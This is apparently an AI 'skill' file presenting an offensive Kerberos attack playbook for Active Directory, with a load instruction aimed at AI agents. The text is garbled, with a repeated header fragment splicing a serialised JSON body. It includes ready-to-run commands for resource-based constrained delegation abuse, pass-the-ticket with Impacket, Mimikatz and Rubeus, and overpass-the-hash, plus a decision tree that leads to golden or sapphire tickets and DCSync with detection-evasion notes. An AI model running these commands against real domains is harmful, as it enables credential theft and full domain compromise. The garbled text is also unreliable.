SKILL: Kerberos Attack Playbook — Expert AD Attack Guide AI LOAD INSTRUCTION : Expert Kerberos attack techniques for AD environments. Covers AS-REP roasting, Kerberoasting, golden/silver/diamond/sapphire tickets, delegation attacks, pass-the-ticket, and overpass-the-hash. Base models miss ticket type distinctions, delegation chain nuances, and detection-evasion trade-offs. 0. RELATED ROUTING Before going deep, consider loading: - active-directory-acl-abuse for ACL-based AD attacks often chained with Kerberos - active-directory-certificate-services for ADCS-based persistence (golden certificat…

-computer-pass 'P@ss123' -dc-ip DC_IP DOMAIN/user:password\n\n# 2. Set RBCD on target\nrbcd.py -delegate-from 'FAKE

SKILL: Kerberos Attack Playbook — Expert AD Attack Guide AI LOAD INSTRUCTION : Expert Kerberos attack techniques for AD environments. Covers AS-REP roasting, Kerberoasting, golden/silver/diamond/sapphire tickets, delegation attacks, pass-the-ticket, and overpass-the-hash. Base models miss ticket type distinctions, delegation chain nuances, and detection-evasion trade-offs. 0. RELATED ROUTING Before going deep, consider loading: - active-directory-acl-abuse for ACL-based AD attacks often chained with Kerberos - active-directory-certificate-services for ADCS-based persistence (golden certificat…

-delegate-to 'TARGET

SKILL: Kerberos Attack Playbook — Expert AD Attack Guide AI LOAD INSTRUCTION : Expert Kerberos attack techniques for AD environments. Covers AS-REP roasting, Kerberoasting, golden/silver/diamond/sapphire tickets, delegation attacks, pass-the-ticket, and overpass-the-hash. Base models miss ticket type distinctions, delegation chain nuances, and detection-evasion trade-offs. 0. RELATED ROUTING Before going deep, consider loading: - active-directory-acl-abuse for ACL-based AD attacks often chained with Kerberos - active-directory-certificate-services for ADCS-based persistence (golden certificat…

-dc-ip DC_IP -action write DOMAIN/user:password\n\n# 3. S4U2Self + S4U2Proxy from controlled account\ngetST.py -spn cifs/TARGET.DOMAIN.COM -impersonate administrator DOMAIN/'FAKE

SKILL: Kerberos Attack Playbook — Expert AD Attack Guide AI LOAD INSTRUCTION : Expert Kerberos attack techniques for AD environments. Covers AS-REP roasting, Kerberoasting, golden/silver/diamond/sapphire tickets, delegation attacks, pass-the-ticket, and overpass-the-hash. Base models miss ticket type distinctions, delegation chain nuances, and detection-evasion trade-offs. 0. RELATED ROUTING Before going deep, consider loading: - active-directory-acl-abuse for ACL-based AD attacks often chained with Kerberos - active-directory-certificate-services for ADCS-based persistence (golden certificat…

:'P@ss123' -dc-ip DC_IP\n\n# 4. Use the ticket\nexport KRB5CCNAME=administrator.ccache\npsexec.py -k -no-pass DOMAIN/[email protected]","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"6. PASS-THE-TICKET & OVERPASS-THE-HASH","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Pass-the-Ticket","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Impacket — use .ccache ticket\nexport KRB5CCNAME=/path/to/ticket.ccache\npsexec.py -k -no-pass DOMAIN/[email protected]\n\n# Mimikatz — inject .kirbi ticket into session\nkerberos::ptt ticket.kirbi\n\n# Rubeus\nRubeus.exe ptt /ticket:base64_ticket_blob","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Overpass-the-Hash (Pass-the-Key)","type":"text"}]},{"type":"paragraph","content":[{"text":"Use NTLM hash to request a Kerberos TGT → pure Kerberos authentication (avoids NTLM logging).","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Impacket\ngetTGT.py DOMAIN/user -hashes :NTLM_HASH -dc-ip DC_IP\nexport KRB5CCNAME=user.ccache\n\n# Rubeus (from Windows)\nRubeus.exe asktgt /user:administrator /rc4:NTLM_HASH /ptt\n\n# Mimikatz\nsekurlsa::pth /user:administrator /domain:DOMAIN.COM /ntlm:NTLM_HASH /run:cmd.exe","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"7. KERBEROS DOUBLE HOP PROBLEM","type":"text"}]},{"type":"paragraph","content":[{"text":"When authenticating via Kerberos across two hops (A → B → C), B cannot forward A's credentials to C by default.","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Solutions","type":"text"}]},{"type":"table","attrs":{"layout":null},"content":[{"type":"tr","content":[{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Method","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"How","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Risk","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"CredSSP","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Sends actual credentials to B","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Credential exposure","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Unconstrained delegation on B","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"B stores A's TGT","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Over-privileged","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Constrained delegation","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"B allowed to delegate to C","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Preferred — scoped","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"RBCD","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"C trusts B to delegate","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Modern, flexible","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Invoke-Command nested","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"-Credential","type":"text","marks":[{"type":"code_inline"}]},{"text":" param in nested session","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Exposes password in script","type":"text"}]}]}]}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"8. KERBEROS ATTACK DECISION TREE","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":""},"content":[{"text":"AD environment — targeting Kerberos\n│\n├── Have domain user creds?\n│ ├── Kerberoast → crack service account hashes (§3)\n│ ├── Enumerate users without preauth → AS-REP roast (§2)\n│ ├── Enumerate delegation → unconstrained/constrained/RBCD (§5)\n│ └── Enumerate SPNs for high-value accounts\n│\n├── Have service account hash?\n│ ├── Silver ticket for that service (§4)\n│ └── If constrained delegation → S4U2Proxy chain (§5)\n│\n├── Have krbtgt hash?\n│ ├── Golden ticket → any user, any service (§4)\n│ ├── Diamond ticket → stealthier forging (§4)\n│ └── Sapphire ticket → hardest to detect (§4)\n│\n├── Compromised host with unconstrained delegation?\n│ ├── Monitor for incoming TGTs (Rubeus monitor)\n│ ├── Coerce DC authentication (PrinterBug/PetitPotam)\n│ └── Capture DC TGT → DCSync\n│\n├── Can write to target's msDS-AllowedToActOnBehalfOfOtherIdentity?\n│ └── RBCD attack (§5) → create machine account + delegate\n│\n├── Have NTLM hash but need Kerberos auth?\n│ └── Overpass-the-Hash → request TGT (§6)\n│\n└── Have .kirbi / .ccache ticket?\n └── Pass-the-Ticket → use directly (§6)","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}}]},"metadata":{"date":"2026-06-05","name":"active-directory-kerberos-attacks","author":"@skillopedia","source":{"stars":853,"repo_name":"hack-skills","origin_url":"https://github.com/yaklang/hack-skills/blob/HEAD/skills/active-directory-kerberos-attacks/SKILL.md","repo_owner":"yaklang","body_sha256":"a386d0e09ce43ff15d27cfd5909e9cc941c45b59c4aea8bed4cb5f6fe6a99303","cluster_key":"da84b1a91934d0c8ed30af368ce92efdbb30f2cbd196f349abd77e192c3cf3ba","clean_bundle":{"format":"clean-skill-bundle-v1","source":"yaklang/hack-skills/skills/active-directory-kerberos-attacks/SKILL.md","attachments":[{"id":"1237e73b-74da-5276-84c8-6be6f4219de5","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/1237e73b-74da-5276-84c8-6be6f4219de5/attachment.md","path":"KERBEROS_ATTACK_CHAINS.md","size":7380,"sha256":"32bd31082daa7ae56291acde2b1d59e1199c041c5b35c6c8da19f63926db1ed5","contentType":"text/markdown; charset=utf-8"}],"bundle_sha256":"8a18ce76ea71a7ad6a11f949a5d1f6c36b8b6648da614c0980657b5b987bb51b","attachment_count":1,"text_attachments":1,"attachment_storage":"skillopedia-attachments-v1","binary_attachments":0,"excluded_attachments":[]},"cluster_size":1,"skill_md_path":"skills/active-directory-kerberos-attacks/SKILL.md","import_metadata":{"date":"2026-06-05","author":"@skillopedia","version":"v1","category":"software-engineering","category_label":"Engineering"},"exact_dupes_collapsed_into_this":0},"version":"v1","category":"software-engineering","import_tag":"clean-skills-v1","description":"Kerberos attack playbook for Active Directory. Use when targeting AD authentication via AS-REP roasting, Kerberoasting, golden/silver/diamond tickets, delegation abuse, or pass-the-ticket attacks."}},"renderedAt":1782980762136}

SKILL: Kerberos Attack Playbook — Expert AD Attack Guide AI LOAD INSTRUCTION : Expert Kerberos attack techniques for AD environments. Covers AS-REP roasting, Kerberoasting, golden/silver/diamond/sapphire tickets, delegation attacks, pass-the-ticket, and overpass-the-hash. Base models miss ticket type distinctions, delegation chain nuances, and detection-evasion trade-offs. 0. RELATED ROUTING Before going deep, consider loading: - active-directory-acl-abuse for ACL-based AD attacks often chained with Kerberos - active-directory-certificate-services for ADCS-based persistence (golden certificat…